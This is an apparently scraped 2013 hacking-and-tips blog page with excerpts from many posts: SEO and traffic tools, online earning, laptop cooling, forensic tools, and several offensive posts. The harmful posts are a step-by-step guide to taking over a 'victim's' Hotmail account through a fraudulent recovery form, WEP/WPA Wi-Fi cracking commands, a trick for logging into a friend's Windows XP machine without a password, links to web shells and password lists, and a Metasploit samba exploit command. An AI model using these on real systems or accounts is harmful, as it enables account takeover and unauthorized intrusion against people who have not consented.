Skip to main content

Posts

Showing posts from June 13, 2013

10 Free Website Hit Counters To Track Website Traffic

10 Free Website Hit Counters To Track Website Traffic Are you looking for free website hit counter to track your website traffic ? If you have a blog or website and want to track amount of visitors of your site, free web counter can help you to track exact number of your site's page views. You can find hundreds of web counters but all of those are not trusted so you should only use trusted and popular website hit counters. In this article, you can see  the list of of 10 free website hit counters which can help you to track website traffic. 1. Google Analytics - Google Analytics is one of the best ways to track exact amount of website traffic including lots of important data. Google offers powerful analysis service to bloggers and website owners free of cost. Only you need to add simple code in your website template and it will start tracking your site's performance. Google Analytics is a safe and fully featured website analysis service that can be used for

10 SEO Sites For Free SEO Tools:-

                10 SEO Sites For Free SEO Tools Do you have a blog or website? If you have a blog, you would know the importance of S.E.O. ( Search Engine Optimization). If you are looking for useful SEO websites to check your website seo factors, this article can help you to find free seo tools. Here you can see the list of 10 best seo websites where you can find free SEO tools . You can check your website seo ranking status by using free seo tools such as current search engine ranking using keyword tools, back link checking tool, page rank checking tool etc. Okay here is the list top 10 SEO sites for free SEO tools 1. Google Webmaster Tools - Google webmaster is a great free service by Google for website owners and bloggers where site owners can see all kinds of seo factors and website ranking related data. Before using this service, you have to verify your website by putting small code on your site so that Google webmaster can help you to give you full detail of y

Top 20 Ways To Earn Online:-

                                    Top Ways Of Earnings:- A cash cow for the enterprising, the Internet is littered with opportunities to make a fast buck. While it rarely qualifies as a solitary source of income, the Net can easily help you supplement it. However, the amount you earn depends on the time and effort invested. Go through these 20 options and find out which ones work for you. Blogging If you're a passionate closet writer who wants to be published but can't find a way to do so, make each keystroke your way to wealth by penning your own blog. Starting a blog doesn't require extensive technical skills but it's important that you have expertise in the field you are writing on. This will attract visitors to your site. Building a large following will enable you to earn profit by luring advertisers, writing paid reviews or getting commissions for promoting other people's products. Paid Writing If maintaining a blog is difficult for you b

Downloads:--

Re-Downloads Links:- 1) https://adf.ly/QQnGS 2) https://adf.ly/QQn0D 3) https://adf.ly/QQhJJ 4) https://adf.ly/QQd8s 5) https://adf.ly/QQo64 6) https://adf.ly/QQoRr 7) https://adf.ly/QQrKB 8) https://adf.ly/QQp7k 9) https://adf.ly/QQd3P The Links Contains Downloads For  Shells,Metasploit, Toolkits,Mass Password txt, Wammp,Xammp,Phpmyadmin,Netool.sh V2.4,Burp Suite V4.1

Hacking Wi-Fi With WPA & WPA2 - By AirCrack-ng

                      Hacking Wi-Fi With WPA & WPA2                                            By AirCrack-ng:-                                            Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, WEP (Wired Equivalent Privacy). WPA (sometimes referred to as the draft IEEE 802.11 i standard) became available in 2003. The Wi-Fi Alliance intended it as an intermediate measure in anticipation of the availability of the more secure and complex WPA2. WPA2 became available in 2004 and is a common shorthand for the full IEEE 802.11i (or IEEE 802.11i-2004) standard. A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup, allows WPA and WPA2 security to be bypassed and effect

Hacking-iphone-to-bypass-ios-7:-

Apple’s flashy new mobile operating system has been in the public’s hands for all of 48 hours. Now one user has already found a bug that blows a hole in its security protections. On Wednesday, 36-year old Jose Rodriguez, an iPhone user who lives on the Spanish island of Tenerife, sent me the video above, showing how to bypass the lockscreen on Apple’s beta version of iOS 7 in just a few seconds. By opening iOS’s Control Room and accessing the phone’s calculator application before opening the phone’s camera, anyone can access, delete, email, upload or tweet the device’s photos without knowing its passcode. Forbes’ video producer Jonathan Hall was able to reproduce the trick and send me photos from a locked phone. “Reading it, it seems difficult,” Rodriguez writes to me. “But it is super easy to do.” It’s no surprise that iOS 7 beta has its flaws. It’s only available to those with developer accounts, for now, and those who have used it describe it as majorly buggy. It’s

Top Ten Hackers

 Top Ten Hackers -->Kevin Mitnick, often incorrectly called by many as god of hackers, broke into the computer systems of the world's top technology and telecommunications companies Nokia, Fujitsu, Motorola, and Sun Microsystems. He was arrested by the FBI in 1995, but later released on parole in 2000. He never termed his activity hacking, instead he called it social engineering. November 2002 -->Englishman Gary McKinnon was arrested in November 2002 following an accusation that he hacked into more than 90 US military computer systems in the UK. He is currently undergoing trial in a British court for a "fast-track extradition" to the US where he is a wanted man. The next hearing in the case is slated for today. 1995 -->Russian computer geek Vladimir Levin effected what can easily be called The Italian Job online - he was the first person to hack into a bank to extract money. Early 1995, he hacked into Citibank and robbed $10 million. Interpol arrested h

HIDDEN USER ACCOUNT........

HIDDEN USER ACCOUNT........ For my next trick I will make a user account disappear, yet remain a full functioning account. Today's Security Tip is another way to lock down your system, and it does this by hiding specified user accounts. This feature is only available in XP and 2000, so unfortunately the rest of you are out of luck. This process does involve an easy registry edit, but if you're uncomfortable with that you might want to think twice about attempting this. Normally when you log into XP, you see the startup screen where you see all the icons for the users who can access. What this tip does is allow you to hide a desired account from this screen. If you want to log on as this user you have to press Cntrl+Alt+Del twice at the Welcome screen to make a Windows Security dialog box appear. Here you can type in the user name and password of the hidden account and log in. Limited Users shouldn't be able to see any sign of you except for the listing in the Documents

How to download pages of a site from Google Cache

How to download pages of a site from Google Cache:- You sometimes get worried when you lose an important file on your computer. There are cases when people lose their whole website due to server errors and regret of not having backed it up. Google, Yahoo, Bing or any other major search engine caches webpages they have already indexed. Generally Google indexes more pages than other search engines for a normal blog. Here’s a trick with which you can recover your website from Google cache. The process has limitations and could be very difficult for large websites but its nonetheless very handy. With this trick, you can get a text version of the pages on your website that have been already indexed by Google. It will be better if you use Mozilla Firefox because this process will require some Firefox plugins to work. On Google search box type the following and run the search. site:yourdomain.com This will return a list of all pages from your website that have been indexed on Google

How To Fix An Overheating Laptop

How To Fix An Overheating Laptop Laptops have undergone an incredible amount of development over the past couple of years. A steep increase in performance was facilitated by chips that are ever more densely packed with transistors. In parallel, the amount of processors was multiplied, the hardware was put into slimmer cases, and better graphics cards enabled bigger screens with higher resolutions. These developments, however, come at a cost: heat. The greatest threat for your laptop, except for your your coffee mug, is overheating. It can cause hardware failure and permanent damage. In this article I will introduce ways that you can prevent or fix an overheating laptop and thus improve the performance and the extend the lifespan of your laptop. How Do You Know Your Laptop Is Overheating? A sure sign that your notebook gets too hot is when your fan always runs at maximum speed. You may also experience reduced performance because the CPU cuts back its clock speed to escape heat

Hacking Emails . .

This method is called Reverting, and you will be sending a form in to microsoft customer support to reset the password for your (or somebody elses) hotmail account. For this method, it helps to know the person, even a little, but i'll still give you a step-by-step tut on how to find the information and fill out each part of the form. NOTE: THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY, I AM NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM THIS. Step 1: go here: https://support.live.com/eform.aspx?prod...mcs&scrx=1 Step 2: Give them your victims full name. Now, if you do not know their first name, try the following things to find it. First, try using these two sites, simply enter their email and hit return. http://www.pipl.com/email http://com.lullar.com if you want more, google their hotmail account(s), for example, type into google: "victimshotmail@ho

How to enter Windows XP computer without entering the Password in the log on screen

How to enter Windows XP computer without entering the Password in the log on screen Hello, Here is a trick from which you can access any friends computer physically without entering there password on the log on screen. This works only on WINDOW XP Operating Systems. Do to this trick,wait for User Log In Screen to appear while Turning On the computer-> Now Just Type the following Keys---> Alt+Ctrl Button and Two times Delete Button. This Type of Dialogue Box will open on pressing the Above Key Combination.---> Type the Username as Administrator and leave the Password field Blank and hit ENTER. After you do this,the computer will Open and you can access your Friend's Computer. BY THE WAY I USE THIS TRICK IN MY College:-

Creating A offline Website:-

Creating A offline Website:- Most of Love to Have their own website?? but after buying domains we many times get into trouble/problems,so here's the solution,first create it offline on your own PC change it as you wish,colour it up,or design yourself, Here's some tools which gonna help you: XAMPP                                                                         Download:- WampServer                                                                          Download:-                                                                         Download:-  PHP MYADMIN:-                 ADMINER:-  download  :-                          FILEzILLA:-              Download:                                                                      Download:-                       Top Gaming script:-    Download:-

AIR (Automated Image & Restore)

                    AIR (Automated Image & Restore)  AIR (Automated Image & Restore) is a GUI front-end to dd/dc3dd designed for easily creating forensic disk/partition images. Supports MD5/SHAx hashes, SCSI tape drives, imaging over a TCP/IP network, splitting images, and detailed session logging. Features Currently supports DC3DD version 6.12.3 (not version 7.0 yet) Download :-

DOWNLOAD GOOGLE BOOKS FOR FREE

DOWNLOAD GOOGLE BOOKS FOR FREE....DOWNLOAD ANY BOOK OR MAGZINE FOR FREE HI GUYZ...HERE IS MY NEW POST WHICH IS SO USEFUL FOR EVERYONE.    ALL OF WE NEED BOOKS , MOST OF THEM WE CAN FIND IN OUR LIBRARIES BUT NOT EVERYONE......SO WE USE THE E BOOKS . THE BEST EBOOKS ARE AVAILABLE ON GOOGLEBOOKS.  THE BAD THING ABOUT IT IZ THAT ON IT WE CAN ONLY READ THE BOOKS WE CANT DOWNLOAD THEM UNTIL WE BUY THEM SO .....NOW NO NEED TO BUY THEM JUZ DOWNLOAD THEM FOR FREE..... STEP 1. SEARCH FOR YOUR BOOK ON http://books.google.co.in/ STEP2 .DOWNLOAD GOOGLE BOOK DOWNLOADER FROM HERE:- Click Here:- STEP3  NOW OPEN THE PREVIEW OF THE BOOK STEP4  COPY THE URL STEP5  PUT IT INTO THE EBOOK DOWNLOADER URL BOX.  STEP6  CLICK START....              AND NOW KEEP READING BOOKS OKAY..

Advance Wi-fi Network Pentesting Notes:-

Advanced Wireless Network Pentesting Notes:- First of all make sure to randomize your MAC address and clean your ARP tables, Use an ALPA usb wirless adapter device or whatever  I- airdump-ng To Sniff The Traffic : All people whom they do pentesting know this part i will not say all how packets works and how wireless AP works and how to use this tool by detail just commands all people know out there  commands : 1) ifconfig wlan0 up 2) macchanger –random wlan0 3) airmon-ng start wlan0 4) airodump-ng mon0 Now you will get all neighbors ( don’t do any pentest on peoples stuff please use this on your own lab ) II- WEP Cracking:- Is easy that any noob can say i can hack the pantagon with this trick  collecting IV keys : minimal 5000 on 64 bit and 250000 on 128 bit Commands : 1) airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface) 2) aireplay-ng -1 0 -a (bssid) -h (Your bssid) -e (essid) (interface) 3) aircrack-ng -b (bssid) (file name-01

dc3dd . .

Description A patch to the GNU dd program, this version has several features intended for forensic acquisition of data. Highlights include hashing on-the-fly, split output files, pattern writing, a progress meter, and file verification. dc3dd Web Site : Download:-

The Autopsy Forensics Browser:--

Description The Autopsy Forensics Browser is a graphical interface to The Sleuth Kit and other open source tools. It allows you to investigate disk images in a fast and easy to use interface. It is a platform that allows other developers to make plug-in modules. Download:-

Webserver Malware Scanner

Webserver Malware Scanner:- Description Webserver Malware Scanner is a simple script for detecting and analyzing web-based threats. It currently handles exploitkits, shells, obfuscated JavaScript codes, Executables, Iframes and port scans. Use the following command to download the latest version: # Non-members may check out a read-only working copy anonymously over HTTP. svn checkout http://webserver-malware-scanner.googlecode.com/svn/branches/ webserver-malware-scanner-scanner Would you like to test our latest versions? svn checkout http://webserver-malware-scanner.googlecode.com/svn/trunk/ webserver-malware-scanner-scanner-trunk We will put your name on the testers list, when we publish the new version. This list will be posted on our Google Code page. Works so far on all linux based Systems. Webserver Malware Scanner Web Site Categories Features Scan for infected DirectAdmin users Scan for open vulnerable ports Log scans Scan for r

Netool.sh V2.4 Released

Netool.sh V2.4 Released:- New modules: 1)webcrawler.py 2)Agressive Directory Scanner 3)Fast Directory Scanner 4)Admin Page Finder 5)WebShell.php Scanner 6)File Upload Scanner [nmap] 7)Scan List.txt of targets Description of the script:- netool.sh is a script in bash to automate frameworks like Nmap,Driftnet,SSLstrip, and ettercap MITM attacks, Retrieves metadata, geo-location of target, changes hostname, change IP and Mac-Address to decoy scans, search for admin login page on taget website, search for directorys inside target website, search for webshells.php planted on website and scan Common URL File Upload vulns, also capture pictures of web-browser surfing of the target machine, perform TCP/UDP packets manipulation using etter.filters, DoS attacks local/external network,also uses metasploit [msfpayload+msfencode+msfcli] to gain control of target machine ... Home project See WIKI : DOWNLOAD LINK: Enjoy, and save hacking . 

Metasploit:-Beast Unleashed -Msfcli--

root@kali :~# msfcli -h Usage: /opt/metasploit/msf3/msfcli [mode] ====================================================================== Mode Description ---- ----------- (A)dvanced Show available advanced options for this module (AC)tions Show available actions for this auxiliary module (C)heck Run the check routine of the selected module (E)xecute Execute the selected module (H)elp You're looking at it baby! (I)DS Evasion Show available ids evasion options for this module (O)ptions Show available options for this module (P)ayloads Show available payloads for this module (S)ummary Show information about this module (T)argets Show available targets for this exploit module Note that when using msfcli, variables are assigned using '=' and that all options are case-sensitive. root@kali :~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PA